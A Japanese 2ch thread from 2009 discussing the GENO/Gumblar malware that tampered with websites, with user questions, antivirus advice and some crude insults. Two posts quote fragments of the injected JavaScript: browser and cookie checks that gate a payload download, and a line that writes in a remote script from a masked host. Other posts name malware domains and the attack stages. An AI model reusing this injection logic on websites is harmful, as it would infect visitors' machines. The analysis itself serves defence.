107192.168.0.774:2009/05/24(日) 12:06:57 ID:hqpRrEcb0
XPhomeにpowerUserあるよ
control userpasswords2からなら変えられる
まぁ、>>106の言うとおりで意味ないけどな
108192.168.0.774:2009/05/24(日) 12:14:57 ID:1zACvPr80
力のあるユーザーか。
109192.168.0.774:2009/05/24(日) 12:27:23 ID:tFlhttKu0
カスペのスキャンで悪意が存在するプログラムkeyloggerが検出されたんですが
これはGENOでしょうか。
110192.168.0.774:2009/05/24(日) 12:28:13 ID:WEGukwsK0
それだけではカスペ使ってる人じゃないと分からないと思うので
エスパーが来るまで待って下さい
111192.168.0.774:2009/05/24(日) 12:31:32 ID:tFlhttKu0
>>110
レスありがとうございます。
待たせてもらいます。
112192.168.0.774:2009/05/24(日) 12:49:40 ID:VjMCeEMy0
だめだこりゃ
113192.168.0.774:2009/05/24(日) 13:32:18 ID:ufM6MerJ0
.
114192.168.0.774:2009/05/24(日) 13:37:38 ID:h/uTUbue0
>>111
皮肉言われてるのに気付いてくれ。おとといきやがれといっしょ。

キーロガーというだけでは、GENOのスクリプトが落としてきたもののバリエーションの1つの可能性も
無関係のどこかで拾ってきたものの可能性もある。ゲーム等で、自前の内容にDinputを置き換えるような奴が、
キーロガーとして検知されることもあるし

エスパーでなければ回答できない。誰も回答できないから諦めろ。
どうしても回答が欲しければ、カスペのスレで、検出名と検出されたファイル名、踏んだ心当たりを正確に
書いて質問すればいい。とにかくここでは、回答貰えません。出直しなさい。

>>112
(゜゜)(。。)うんうん
115192.168.0.774:2009/05/24(日) 13:40:05 ID:tFlhttKu0
>>114
すみませんでした。
116192.168.0.774:2009/05/24(日) 15:23:22 ID:2W8NCPrM0
誘導

【Anti Virus】Kaspersky Lab Part83【カスペルスキー】
http://pc11.2ch.net/test/read.cgi/sec/1240735790/
117192.168.0.774:2009/05/24(日) 15:25:36 ID:74FjqYRv0
>>114
優しいですね
118192.168.0.774:2009/05/24(日) 18:18:32 ID:SX0zJqf70
Meだから安心
119192.168.0.774:2009/05/24(日) 18:31:56 ID:l6NMT+y60
ごしゅじんさまにあえて、えむいはしあわs…
120192.168.0.774:2009/05/24(日) 19:46:13 ID:CuuFY58N0
やめろおおおお
121192.168.0.774:2009/05/24(日) 19:48:55 ID:INl1BLTo0
やめて涙出るからやめて

Me使ったことないけど泣けるからw
122192.168.0.774:2009/05/24(日) 20:32:50 ID:DbyLrNnz0
Meたん使いの俺号泣
123192.168.0.774:2009/05/24(日) 21:27:10 ID:gNsaRzby0
時代が進めばそのうち
ごしゅじんさまにあえて、えっくすぴーはしあわs…
になる時が来るのか
124192.168.0.774:2009/05/24(日) 21:29:55 ID:oOp80I+s0
たぶん、【32bit】まだまだXPを使い続けるスレ 13GB【CD-ROM】とかいうスレが立ってるw
125192.168.0.774:2009/05/24(日) 21:50:40 ID:knIrnezr0
このスレも低レベル化してきたか…
情報提供とかする必要ないよね…こんな民度なら。
126192.168.0.774:2009/05/24(日) 21:55:18 ID:lzXlDT8y0
>>125
ま、本当に情報提供できる奴なら言い訳じみた愚痴よりも情報が先に出るもんだがな
127192.168.0.774:2009/05/24(日) 22:04:44 ID:kwJlcu/p0
わー125は高レベルでとんでもなく民度が高いんですねーすごいなー
なんで2ちゃんのスレなんかに書き込みしてるのー?

うつっちゃうよ?w
128192.168.0.774:2009/05/24(日) 22:17:35 ID:knIrnezr0
今までVMでの感染確認とか検体提供とかやってきたけど、うつっちゃうらしいからやめます
で、もうここにも来ませんので安心して書き込み続けてください
129192.168.0.774:2009/05/24(日) 22:19:28 ID:zG/5ojVF0
セキュ板帰ろうぜ
130192.168.0.774:2009/05/24(日) 22:24:30 ID:oOp80I+s0
>>128 皮肉を込めたつもりだろうが、ま、踏むスレで会おう
131192.168.0.774:2009/05/24(日) 22:44:06 ID:YgJDyVRl0
レベルと民度がうつっちゃう言われてんのに聞かないから…
132192.168.0.774:2009/05/24(日) 22:53:05 ID:heAsx668P
最近、沈静化して来た?
133192.168.0.774:2009/05/24(日) 22:59:56 ID:inQC6pkk0
>>132
ウイルスバスターが機能してないから検出すらできなくてってパターンで3件ほど身近にあったから
表に出ないだけでかなり伝播してるはず
134192.168.0.774:2009/05/24(日) 23:04:14 ID:aJuP8TRJ0
高レベルな人向けのスレって別にできたんじゃなかったの。
大事な情報は、そっちに上げたほうがいいと思う。
ここは、一般向けの情報で十分なのでは?
135192.168.0.774:2009/05/24(日) 23:16:40 ID:nMp8odr00
すっごくむかついたんだろうなあw
分かるよその気持ちw
136192.168.0.774:2009/05/25(月) 00:53:49 ID:kdtDbFTU0
>>132
本体配布サイトが止まってるからね。
137192.168.0.774:2009/05/25(月) 02:34:31 ID:Not8R34U0
>>134、やっぱ間違い。ウイルス飼って実験してるような人の情報は、
ここに上げてもらえれば、別スレの人も見てるだろうし、必要なら
誘導してくれるってことかな? そう自分が思ってるだけだけども。
138192.168.0.774:2009/05/25(月) 02:48:16 ID:29sMFtyK0
>>137
>>126

だから心配しなくてもいいよ
139192.168.0.774:2009/05/25(月) 03:03:15 ID:Not8R34U0
あっ、はい。そうだとは思いましたが、ほかにも情報提供に来る人がいて、
レス読んで帰っちゃうといけないと思って。差し出がましいことをしました。
140192.168.0.774:2009/05/25(月) 03:52:16 ID:g0EArU8a0
まだ出てない情報って何がある?
C&C鯖がウクライナとイギリスにあってまだ生きてる
とか使用も無い情報しか知らないんだけど
141192.168.0.774:2009/05/25(月) 09:30:19 ID:orpiBNMg0
最新の情報じゃないかもしれないけど感染したサイトのJSってIEじゃないとifで弾かれるよね?つまりIEじゃなきゃ感染しないよね?
142192.168.0.774:2009/05/25(月) 09:52:49 ID:OIu3WwGb0
あれ、chrome以外はみんな対象じゃなかったっけ
143192.168.0.774:2009/05/25(月) 09:57:19 ID:OIu3WwGb0
うん、やっぱりIEも火狐もOperaもSafariも感染対象

http://takeshima.2ch.net/test/read.cgi/news4vip/1242637188/503
503 名前:以下、名無しにかわりましてVIPがお送りします:2009/05/18(月) 20:50:57.57 ID:PuSZbVxyP
コード展開して見てみたら、最後に読み込ませるかどうかの部分にこんな処理が

if(
(u.indexOf("Chrome")<0)//Google Chromeでなく
&&
(u.indexOf("Win")>0)//かつWindowsで
&&
(u.indexOf("NT 6")<0)//なおかつWindows 6=Vistaでなく
&&
(document.cookie.indexOf("miek=1")<0)//かつ踏んで感染したときにつけられるデータがなく(=踏むのがはじめてで)
&&
(typeof(zrvzts)!=typeof("A"))//かつリロードしてない、初めての読み込みであるとき
){
DLさせる処理
}
144192.168.0.774:2009/05/25(月) 10:05:54 ID:9na8SiBQ0
続きがあるんだよ

> if(window.ScriptEngine) j=j+ScriptEngineMajorVersion()+ScriptEngineMinorVersion()+ScriptEngineBuildVersion()+j;
> document.write("<script src=//****"+"**.**/vid/?id="+j+"><\/script>");

Safari/Winで踏むと、?id= のうしろが最終的にブランクになる
このGETに対して何か鯖側が準備してたかってことになるわけ
してたかもしれんし、してなかったかもしれん
145192.168.0.774:2009/05/25(月) 10:07:49 ID:xQ23/q8u0
1.js(>>143)
2.id=100 or id=101(ie not ie (script))
3.id=2 and id=3(pdf and flash)
4.id=10(exe)
5.ttp://anubis.iseclab.org/?action=result&task_id=1890669b0bd937574e5be45e24c63ea80&format=html
146192.168.0.774:2009/05/25(月) 11:25:57 ID:l1RBWHbr0
いまさら何言ってんだか
IEでなくても普通にpdf/swf落ちてきてたから
147192.168.0.774:2009/05/25(月) 12:18:46 ID:zMoesA260
zlkonでは無指定でも落ちてきた
martuzでは指定パターンによって落ちてこなくなった
gunblarがどっちだったかは知らん
148192.168.0.774:2009/05/25(月) 12:31:02 ID:tQ4f0t5i0
>>98
そうじゃなくて、
Shockwave FlashとFlash PlayaerそれぞれにFirefoxとか用のPlugin版とIE専用のActiveX版があるの。
だから、4種類全部がインストールされている人もいるわけ。
149192.168.0.774:2009/05/25(月) 15:08:58 ID:L01Nn5aV0
パソコン初心者板の「初心者スレッド」っていうの開いたら
ノートン先生が怒ったんですがウィルスですか?
リンク踏んだわけじゃなくてスレ開いただけなんですが
150192.168.0.774:2009/05/25(月) 15:10:33 ID:/uV5OlPd0
なぜそれをここで聞く?
151192.168.0.774:2009/05/25(月) 15:15:44 ID:L01Nn5aV0
2ちゃんスレも危ないのかと思ったんです、すみません
152192.168.0.774:2009/05/25(月) 15:21:34 ID:/uV5OlPd0
じゃあここも2ちゃんだから危ないね
他のところで聞くなり調べるなりしたほうがいいよ
153192.168.0.774:2009/05/25(月) 15:28:05 ID:L01Nn5aV0
初心者板でなければどこで・・
ノートン誤作動で聞けばいいでしょうか
154192.168.0.774:2009/05/25(月) 15:33:24 ID:b26zynpUP
海外もサイトも感染してるな
155192.168.0.774:2009/05/25(月) 15:35:05 ID:xQ23/q8u0
海外も3月末から感染しまくってますが、どうかされましたか
156192.168.0.774:2009/05/25(月) 15:35:17 ID:xwO8FSQb0
そりゃ、海外から来たウイルスだからな
157192.168.0.774:2009/05/25(月) 16:03:57 ID:9na8SiBQ0
スレ違いにあたるのでヒントだけ
2ちゃんねる ノートン でぐぐる。対策はなにげに面倒だったりするが、まずはなにごとか知ること
158192.168.0.774:2009/05/25(月) 16:44:23 ID:g0EArU8a0
SafariなんぞWin98と同じで眼中に無かっただけだろ
159192.168.0.774:2009/05/25(月) 17:29:01 ID:kdtDbFTU0
ノートントラップのことは初心者スレで聞けよ
160192.168.0.774:2009/05/25(月) 17:38:15 ID:YvB3PQLE0
リストって情報古いまま?
pixivが一部感染になってるけどこれは…
161192.168.0.774:2009/05/25(月) 17:55:54 ID:d34ru99R0
あのリストとチェックサイトの件は無かったことにしたほうがいいよ
今となってはかえって混乱を増幅してる
162192.168.0.774:2009/05/25(月) 19:48:26 ID:d84pSB9l0
>>160
pixiv のプロフィールページで自分のHPやブログにリンクを貼ってる人がある程度いる。
そのなかで感染してるページがあったという噂に基づく....らしい。
163192.168.0.774:2009/05/25(月) 21:41:49 ID:JhdhMmYC0
GENOの所が、またやらかしたらしい・・・

378 名前:Socket774 投稿日:2009/05/25(月) 14:40:04 ID:Xd8gaLc7
GENOでポイント照会すると、他人のIDが出て来ちゃう(>_<)

380 名前:Socket774 投稿日:2009/05/25(月) 15:15:22 ID:b7/1msFI
>>378は、他人のID使ったなりすまし犯罪者ですね、わかります。

381 名前:378 投稿日:2009/05/25(月) 15:25:46 ID:Xd8gaLc7
>>380
なりすましじゃないよ。
注文照会したら、「注文された商品はありません」ってなってたから、
おかしいって思って、ポイント照会したら、他人のIDがでてきた。
で、会員情報の修正って所をクリックしたら…。

382 名前:Socket774 投稿日:2009/05/25(月) 15:33:03 ID:b7/1msFI
ほんとだ。ログインし直しても、他人の名前とIDとポイント獲得歴が出てしまい、
自分の情報が閲覧できないぞ。

383 名前:378 投稿日:2009/05/25(月) 15:34:19 ID:Xd8gaLc7
>>382
だろ。
自分の個人情報も変えれねーwww
164192.168.0.774:2009/05/25(月) 21:54:51 ID:+y9+ZUOu0
さすがGENOさん!俺たちに(以下ry

つか、こんな騒動があっても利用する奴が居る事に驚いた。
165192.168.0.774:2009/05/25(月) 22:08:06 ID:jKyVT4Df0
7つのNOだな
166192.168.0.774:2009/05/25(月) 22:14:53 ID:2+gm0oNq0
何やってんだGENOは・・・
167192.168.0.774:2009/05/25(月) 22:31:48 ID:73AdRoBk0
オレも他人のIDで出たぞ
アカ削除することもできねぇ
168192.168.0.774:2009/05/25(月) 22:39:30 ID:ju8jdLa20
別種のウィルスに感染してたりしてな
ログインした人も軒並み感染とか・・・
だとしたら新GENOウィルスって名前になるのかなw
169192.168.0.774:2009/05/25(月) 22:47:26 ID:1LBKGrg40
他人のIDとごっちゃとか半端ねぇww
170192.168.0.774:2009/05/25(月) 22:50:18 ID:c0a0QXT00
GENO第二章の始まりか?
それにしても他人の名前やらIDやらが出るってひでーな
171192.168.0.774:2009/05/25(月) 22:57:50 ID:R7WqhNJI0
これが別のウイルスのせいだったらGENOウイルスIIとかハイパーGENOウイルスとか
そんな名前にするの?
172192.168.0.774:2009/05/25(月) 23:00:27 ID:2XNmNZPd0
今回の問題に関するGENOの回答も期待できるのかなw
管理者がバカやらかした可能性もまたウイルスな可能性もあそこならありえる
173192.168.0.774:2009/05/25(月) 23:03:51 ID:/SYvB9LI0

改ざんサイトをGoogleで簡単に発見可能なことが判ったのでメモ。

1. 任意のドメインをGoogleのセーフ ブラウジングで検索する。
例えば「google.com」なら、http://safebrowsing.clients.google.com/safebrowsing/diagnostic?client=Firefox&hl=ja&site=google.com
をブラウザで開く。
2. 表示された「Google セーフ ブラウジング診断ページ」で、
「This site was hosted on xx network(s) including」の後にあるリンク(上の場合、「AS15169 (GOOGLE)」)をクリック。
3. そのネットワーク内でホスティングされている改ざんサイトのURLが挙げられるので、リンクをクリック。
4. 「不正なソフトウェアは gumblar.cn/ を含む 1 個のドメインでホストされています。」といった文章があれば、gumblarスクリプトに改ざんされた可能性あり。
174192.168.0.774:2009/05/25(月) 23:04:38 ID:/SYvB9LI0
これをドメイン名を変えて総当たりでひたすら続けると、ぞろぞろ出てきます。
ちなみに検索するドメイン名は、「google.com」と「www.google.com」とでは検索結果が違うので注意。
「www.」なしで検索して「疑わしくない」という結果が出ても、「www.」などを付けると「疑わしいサイト」になったりします。
175192.168.0.774:2009/05/26(火) 03:39:47 ID:adE8bcIF0
>>174
お前にパソコン通信は無理
176192.168.0.774:2009/05/26(火) 03:46:27 ID:/VVIOLJQ0
パソコン通信ワロタww
177192.168.0.774:2009/05/26(火) 04:22:39 ID:opExhozI0
パソ通の時代なんて知らんけどまずはニフティマネージャを(ry
178192.168.0.774:2009/05/26(火) 04:29:44 ID:0NS4XGEC0
新しいウィルスだったらNEOGEOウィルスで
179192.168.0.774:2009/05/26(火) 04:30:08 ID:/ktv3JuM0
このウイルスって感染すると専ブラの調子もおかしくなるのかな…
180192.168.0.774:2009/05/26(火) 04:45:10 ID:mifzxisU0
>>179
よほどのマシンパワーがないと全てがまともに動かん
181192.168.0.774:2009/05/26(火) 04:48:59 ID:mifzxisU0
とか言ったけど上はVM上の話な
普通気がつくレベルと思うけど
182192.168.0.774:2009/05/26(火) 04:53:06 ID:/ktv3JuM0
そっか…ありがとう
chmファイルは異常ないみたいなんだけども
何故かいくつかのスレが表示がおかしくなるんだけどそっちは別の原因があるのか
183192.168.0.774:2009/05/26(火) 08:57:00 ID:xUEn5PcS0
>>182
別件や別ウイルスでレジストリ狂ってんじゃね?
クリーンインスコやろうぜクリーンインスコ
慣れたら快感になるからやろうぜ
184192.168.0.774:2009/05/26(火) 09:40:42 ID:NRkVzeKAO
>>183は踏みすぎwww
185192.168.0.774:2009/05/26(火) 10:50:49 ID:ti9+LTirO
快感になるワロタ
だが分からんでもない
186192.168.0.774:2009/05/26(火) 11:32:19 ID:Z2FeIoNLP
WindowsもLinuxみたいにバッチファイルひとつで、
クリーンインストール後の設定とアプリインストールとアップデートがワンタッチでできればいいのにね。
ドライバ、アップデート、必要なアプリインストールとか環境整えるのが面倒すぎる。
187192.168.0.774:2009/05/26(火) 11:57:33 ID:Au+8+Nsd0
Windows 7でそういう機能を搭載するのかと思ったけど違うみたいだしね
188192.168.0.774:2009/05/26(火) 11:57:48 ID:MO01MAyz0
企業向けには避けて通れない機能で、msbatch.inf とかAIK とかあるわけだが、
そのスクリプトを書くのがけっこう面倒だったりする

再インスコしたら、切る(start=demand も含む)サービスの一覧だけは、
毎度面倒なわりに、バッチを書くのが簡単なので、バッチにしておいてある

あとは砂箱か
189192.168.0.774:2009/05/26(火) 11:58:26 ID:R/KlVnzg0
>>182
ノートントラップみたいにAvastトラップがあるからなw
190192.168.0.774:2009/05/26(火) 12:04:04 ID:Au+8+Nsd0
>>188
ありがとう
191192.168.0.774:2009/05/26(火) 12:16:02 ID:ZHtkN1G7O
ブログの、記事じゃなくてコメントを開いてから、パソコンの調子がおかしくなったんだけど

普通コメントに書き込んでウイルス撒くなんてのは出来ないですよね?
ウイルスとは関係ないのかな…
192192.168.0.774:2009/05/26(火) 12:31:27 ID:l/mq9I5TP
>>191
そのページに悪意あるスクリプトがあるかどうかで決まる
>>2をみて確認しとけ
193192.168.0.774:2009/05/26(火) 13:30:59 ID:0mP/syHF0
感染サイトリストの紹介文のところのURL、なんで踏めるようにしちゃったんだろう
194192.168.0.774:2009/05/26(火) 13:43:09 ID:IhQBcdl+0
>>189
avast!だが別におかしくならないぞ?
195192.168.0.774:2009/05/26(火) 14:02:41 ID:bEUyE4rkP
>>179
俺はavast使い始めた時にちょっとおかしくなった
具体的には明らかに>>200までしか進んでないのに、>>800宛のレスが当然のように(しかも複数)使われてたり。
まぁスレにウィルスのコードか何かが張られてて、それを察知したavastたんがスレの大部分を隔離してただけだったんだが。
196192.168.0.774:2009/05/26(火) 14:05:44 ID:g4Ut+ZKA0
datぶっ壊れたらそうなるよ
197191:2009/05/26(火) 14:35:00 ID:ZHtkN1G7O
>>192
ありがとうございます!
今確認してみたら、そのファイルも50,727バイトだったし、レジストリエディタも立ち上がった…
よかった!
ただ、IEが妙に終了したりするようになったのが気になるな…
198192.168.0.774:2009/05/26(火) 15:27:40 ID:76kSxz87P
最近「IPアドレス取得中」と表示されます
環境は,XPSP3 YBB12Mで無線LAN接続しています
ここ最近、起動時にネットには接続できるのですが
アイコンが「IPアドレス取得中」の状態なんです
修復すると正常のアイコンに戻ります。
このウィルスに感染したんでしょうかね?


199192.168.0.774:2009/05/26(火) 15:32:25 ID:3uBHEXNZO
200192.168.0.774:2009/05/26(火) 15:32:58 ID:/ktv3JuM0
>>183
クリーンインスコか…最終手段はそうしてみる
avastは入れてないんだけどなんか開けないスレがいくつかあるんだよな
とりあえずdatを消してみてまた取得しなおしてみる
201192.168.0.774:2009/05/26(火) 15:33:05 ID:Z2FeIoNLP
なんでもかんでもGENOのせいw
202192.168.0.774:2009/05/26(火) 15:36:26 ID:76kSxz87P
>199
>1は読んで対応済みです
203192.168.0.774:2009/05/26(火) 15:38:45 ID:whX8t5/V0
204192.168.0.774:2009/05/26(火) 15:49:07 ID:l/mq9I5TP
>>198
・・・さすがに酷い、わざわざ質問する前にテンプレみて確認しろよ
つーか、GENOかどうか疑う前に IPアドレス取得中 でggrks
205192.168.0.774:2009/05/26(火) 16:32:20 ID:AzhiVy6U0
>>197
Genoではないものの他のウイルスに感染している
可能性もあるのでニフティなどでスキャンをしてみてください
206192.168.0.774:2009/05/26(火) 16:56:24 ID:3uBHEXNZO
>>202
1は読んだんですね、すみません
それならもうネットに繋がない方がいいですよ
207192.168.0.774:2009/05/26(火) 17:05:14 ID:xUEn5PcS0
つかこれ釣りじゃね?
208192.168.0.774:2009/05/26(火) 18:35:15 ID:R/KlVnzg0
>>198
お前の環境が悪いだけ。有線で繋いどけ。
209192.168.0.774:2009/05/26(火) 20:16:30 ID:jrdNXPLC0
前スレ?かな、次はQuickTimeとか狙われるかも
みたいなレスがあったと思ったけど
こんなことになったぜ・・・
http://www.forest.impress.co.jp/article/2009/05/26/quicktimevulner.html
210192.168.0.774:2009/05/26(火) 21:50:53 ID:MO01MAyz0
このネタ既出?w

http://www.geocities。jp/bjpinoko20/hgkouza.htm

gumbler へのリンクが埋め込まれているはずですが…。

> /./g
211192.168.0.774:2009/05/26(火) 22:15:34 ID:2djNJEe50
firefoxだとsafebrowsingに怒られちゃうな
212192.168.0.774:2009/05/26(火) 22:51:29 ID:q+URMcwD0
GenoVirus感染サイトリストのコメントのURLがリンクになってるんだけどいつからだろ?
これ間違って踏む人出そうで危ないような気がするんだが…。
213192.168.0.774:2009/05/26(火) 22:54:43 ID:zO7o4gpQ0
間違って踏む人なんかいるか?
それより、駆除できてるのに、いつまでもリストアップされてるサイトが気の毒。
214192.168.0.774:2009/05/26(火) 23:53:25 ID:7dDKXeJO0
駆除しても告知しなきゃ意味ないだろ
気の毒も何もあったもんじゃない
これじゃ元々感染してないのか駆除済みなのかわからん
215192.168.0.774:2009/05/27(水) 00:22:48 ID:Q9qE4kHO0
それはうp主に言ってるの?
感染サイトに言ってるの?
216192.168.0.774:2009/05/27(水) 00:26:07 ID:Zw9diHMU0
サイトとかページに対して「感染」とか「駆除」とか言うと
あたかもウイルスの実体がサイト自体、ページ自体にあるかのように
誤解する人が出る
217192.168.0.774:2009/05/27(水) 00:44:02 ID:DS7RW+Eb0
感染サイト、今リロッたらたらリンクなしになってた

ところでpass入れても記事削除できないんだが自分だけか?
同じ記事を2重に書いてしまい、ひとつは消せたから、pass間違いはないはず。

同じ不具合?があるなら、
上げた人が誤報告や対策済みと確認したところで、修正できないわけだが…
218192.168.0.774:2009/05/27(水) 00:45:32 ID:Q9qE4kHO0
あー、それはあるかもな。
厳密には「管理者のPCがトロイの木馬型ウイルスに感染したために不正に改竄されたサイトリスト」・・・・・・て長いよっ。
219192.168.0.774:2009/05/27(水) 00:56:26 ID:SmAh1nJS0
なんか次はQuickTimeの脆弱性が突かれそうだな。
毎度のごとくパッチが用意される前にアドバイザリが公開され、
ゼロデイ状態になってるから、Adobeよりも狙い目なんじゃ
ないか?
220192.168.0.774:2009/05/27(水) 02:57:28 ID:NCsP4Es70
>>216
ってか途中までそう思ってた。


そしてQuickTime入れてない俺は勝ち組。
221192.168.0.774:2009/05/27(水) 05:42:48 ID:aSvBKq6i0
うっしゃ自分もいれてない。
あれ、ことあるごとにインスコされようとするからウザいんだよなぁ
222192.168.0.774:2009/05/27(水) 10:38:07 ID:mqE4guJk0
XSS対策されてないblogとかのwebサービスは、
投稿者がスクリプト投稿したら閲覧者が感染するよ

今はmartuz止まってるみたいだから、martuz以外から実体拾うようにしないと無理だけど。
223sage:2009/05/27(水) 11:07:25 ID:+948GCw/0
>>148、すみません。全然、理解していませんでした。こうでしょうか?
Firefox用プラグイン Shockwave Flash―――――――Flash Player
          Shockwave for Director―――-Shockwave Player
IE用 ActiveX Shockwave Flash Object―――-Flash Player
          Shockwave ActiveX Control――Shockwave Player

でも、自分は、まだFlashとShockwaveの違いも よく分かってませんが、
ほんと難しいなと思いました。
Macromedia社やDirectorなどの成り立ちから、通常 呼び分けていた流れと、
機能面からか、それぞれ製作側、閲覧側のツールとして捉える向きと
Web上に混在していて、時系列を把握していないと、一概には咀嚼できないんですね。
この認識も、ものすごく浅いところでは、という注釈つきでもダメかもしれませんし……。
とにかく自分は Flashの歴史について無知すぎた。
アドオン、プラグイン、ActiveXコントロールなどの
拡張パックの語彙・用法に関してもAboutすぎました。
224192.168.0.774:2009/05/27(水) 11:15:10 ID:H/k8FWrU0
>>219
QuickTimeに限らず、昔からApple製のソフトは極め付けに行儀が悪く、
汚れた手で全身を撫で回されるような気持ち悪さがあるから常識のある奴は使わない。
感染するのはiPhoneやiPodみたいなアイテムを使ってる変態共だけだろ。
225192.168.0.774:2009/05/27(水) 11:41:56 ID:cNx9FNpE0
>>223
日本語でおk
226192.168.0.774:2009/05/27(水) 11:42:07 ID:Lh6wq4Ey0
確かに入れてるだけでしぶとくしつこくスタートアップに居座ろうとするQuickTimeは、難儀な存在だな。
iTunesとがんじがらめにしてるところもあざとい。
227192.168.0.774:2009/05/27(水) 11:54:47 ID:5HmcqpnuP
iTunesとかQuickTimeはMACで使うもの。Windowosには入れてない。
228192.168.0.774:2009/05/27(水) 11:59:32 ID:zItNA/Lv0
amazon危険度92%って微妙すぎて怖い
229192.168.0.774:2009/05/27(水) 12:02:47 ID:dxmZredg0
携帯用に変換するためだけに入れてるけど、そんなに行儀悪いのか?
年に数回しかつかわないし、iPodは持ってない・・・
230192.168.0.774:2009/05/27(水) 12:11:01 ID:KFsQLuii0
俺はゆるいあぽー信者だが、環境維持という観点では、
耐えられないって意見が出てくるのもしゃーない挙動はちょくちょくあるね
最近では、勝手にSafariダウソとか 信者から見てもありゃやりすぎだw

例によって、砂箱にほうり込んでおけばおk
231192.168.0.774:2009/05/27(水) 12:32:52 ID:tYvKSspx0
>>229
俺も変換君のためだけに入れてる
232192.168.0.774:2009/05/27(水) 12:52:51 ID:0KD43PY10
>>224
常識のある奴って・・・www
ああ、そうか、常識のある奴は>>224のような書き込みをするのか・・・
233192.168.0.774:2009/05/27(水) 13:29:48 ID:aSvBKq6i0
これ思い出した。

iTunesが おきあがり
なかまに なりたそうに こちらをみている!
なまかに してあげますか?

>はい

iTunesが なかまに くわわった!
QuickTimeが なかまに くわわった!
Bonjour for Windowsが なかまに くわわった!
234192.168.0.774:2009/05/27(水) 13:36:09 ID:6IjdJuck0
>>229
そういやQuicktimeってFirefoxを勝手に設定書き換えたり
プラグイン突っ込んだり一部ファイルの処理横取りしたりでレイプし放題だったな
235192.168.0.774:2009/05/27(水) 13:48:08 ID:H/k8FWrU0
Apple製品を使うってことはApple様に向かって股を開いて
「私はApple様の従順な奴隷ですから思う存分ファックしてください」と宣言するようなもの

そんな連中はウイルスに感染しても別に普段と変わらないと思うよ
ファックするのがApple様じゃなくて得体の知れないウイルスに代わるだけだしな

俺たちはそんな連中に近寄りたくないだけで
236192.168.0.774:2009/05/27(水) 14:15:12 ID:p3rI2ovh0
最新
Flash Player 10.0.22.87
Adobe Reader 9.1.1

まだ↑これが最新だよね?
237192.168.0.774:2009/05/27(水) 14:21:44 ID:pn6iaSeA0
ここはいつからアポースレになった?
238192.168.0.774:2009/05/27(水) 14:52:04 ID:n6+UUmaxP
QuickTimeなんてイラネだろ
239192.168.0.774:2009/05/27(水) 14:56:15 ID:dxmZredg0
いらないんだけど変換君便利なんだよな・・・
240192.168.0.774:2009/05/27(水) 14:58:23 ID:DMxSQASUO
林檎信者も林檎アンチもゴミ、つまり>>235もゴミ
241192.168.0.774:2009/05/27(水) 15:06:57 ID:7U85I7ws0
何を使おうが、
適切に選んでるか、使いこなしてるか、管理できてるか、
が問題であってだな・・・

面倒な上、馬鹿馬鹿しいので止めた
242192.168.0.774:2009/05/27(水) 15:17:28 ID:KFsQLuii0
スレ的には、Flash/Acrobatの穴がだいぶふさがったら、
いずれ順番で、QTの脆弱性も突かれるのかもな
ただ、Flash/Acrobatと違って、業務機よりホーム機に入ってる方が多そうだから、
攻撃者にとって「おいしい」かどうかは、攻撃者のターゲット範囲によってくるか
243192.168.0.774:2009/05/27(水) 15:17:32 ID:0KD43PY10
変な奴に触ってしまったえんがちょえんがちょ
244192.168.0.774:2009/05/27(水) 18:53:55 ID:LtJky3Fi0
QuickTimeは勝手に自分を標準プレイヤーにしたり
ブラウザ上で開くだけでスタートアップに登録したりと困りもの
で、QuickTimeの挙動がウザイ、でも変換君は使いたい
って人はQuickTime Alternativeがおすすめ
ただ変換君が使えるバージョンが入手かわからんが
245192.168.0.774:2009/05/27(水) 19:11:14 ID:LoTgBZbR0
>>244
自分もそれ使ってる。
RealもQuickもこれで間に合うからな。
プレイヤーはいらないし。
246192.168.0.774:2009/05/27(水) 19:53:39 ID:7RRpVkld0
GENOウィルス・質問掲示板
http://www1.atchs.jp/test/read.cgi/gegegeno/1/680-680
ここの680が書いてる555のタグ情報って既出?
247192.168.0.774:2009/05/27(水) 20:09:22 ID:cL+kp0Pk0
>>233
あるあるすぎて困る
248192.168.0.774:2009/05/28(木) 00:46:33 ID:6Q6FXXKz0
しかしすっかり落ち着いた流れになったけど
皆どうしてるんだろう
249192.168.0.774:2009/05/28(木) 00:49:47 ID:UQFqDqzO0
応急対策はできても、恒久対策ができてないからね
ウイルスが活発化しなければ、このままフィードアウト何じゃないかな・・・
250192.168.0.774:2009/05/28(木) 00:56:36 ID:XYDCILBX0
フィ…フィードアウト…
251192.168.0.774:2009/05/28(木) 00:57:59 ID:0cYThVoc0
なにそれこわい
252192.168.0.774:2009/05/28(木) 01:00:25 ID:UQFqDqzO0
未だに対応(駆除、消去)のソフト聞かないし・・・
遅いよね・・・
253192.168.0.774:2009/05/28(木) 01:06:17 ID:ysEgixzlP
システムに不可逆な改変を加えるマルウェアに感染したら安全が確認されている
バックアップから書き戻すかOSの再インストールするしかない
254192.168.0.774:2009/05/28(木) 01:30:38 ID:mVG3+O460
自分の興味はウイルスから不正改竄に移った。
zone-hとかizumino.jpを見て、日々こんなにハッキングが行われているのかと。
GENOでなくても、これじゃいつどこに新種のウイルスが仕込まれてもおかしくない罠。
255192.168.0.774:2009/05/28(木) 04:20:23 ID:lNaKdK5O0
海外の方だと、インターネットの経路上にパケットキャプチャが仕掛けられていることすらあるしな。
そこを流れた平文パスワード(pop3とかftpとかtelnetとか)はダダ漏れ

辞書によるID/PASS総当りも常套手段だし、最近は日本人の名前やアニメ・ゲームのキャラクタまで入ってる。
安易なID/PASS設定しておくと、いつのまにかログインされて使われているオチ

「誰かが守ってくれる」なんて思っていたらインターネットでは生き残れない。
256192.168.0.774:2009/05/28(木) 05:46:40 ID:eSuKYW+W0
楽天がメールアドレス含む個人情報を「1件10円」でダウンロード販売していることが判明 ★2
http://tsushima.2ch.net/test/read.cgi/news/1243425827/
257192.168.0.774:2009/05/28(木) 08:08:54 ID:7x2zaD760
>>256
GENOと関係なし。
258192.168.0.774:2009/05/28(木) 09:55:39 ID:j5JE7+Uz0
>>255
2chだと自演するためだけに適当な串さしてる奴も危機感がないと思う
何されてるのか分からんのに
259192.168.0.774:2009/05/28(木) 12:14:11 ID:Mzk/ssdW0
わけのわからない串は、わけのわからないモノを取りに行くのにけっこう助かったり
マルウェア差し上げます。おひとりさま(1IP) 1日1回まで。みたいなとこ

martuzもそんなんじゃなかったっけか

ま、POSTにはつかわん 秘匿性は期待しとらん
260192.168.0.774:2009/05/28(木) 16:31:51 ID:bhK+RmSY0
新マルウエア「GENOウイルス」蔓延に注意
http://www.asahi.com/digital/digitre/TKY200905250299.html

ASAHIでも記事になったようだ。GENOは無料で広告できていいねぇwww
261192.168.0.774:2009/05/28(木) 16:53:51 ID:OoqSOCZLP
fc2やっと注意喚起のメール来たよ
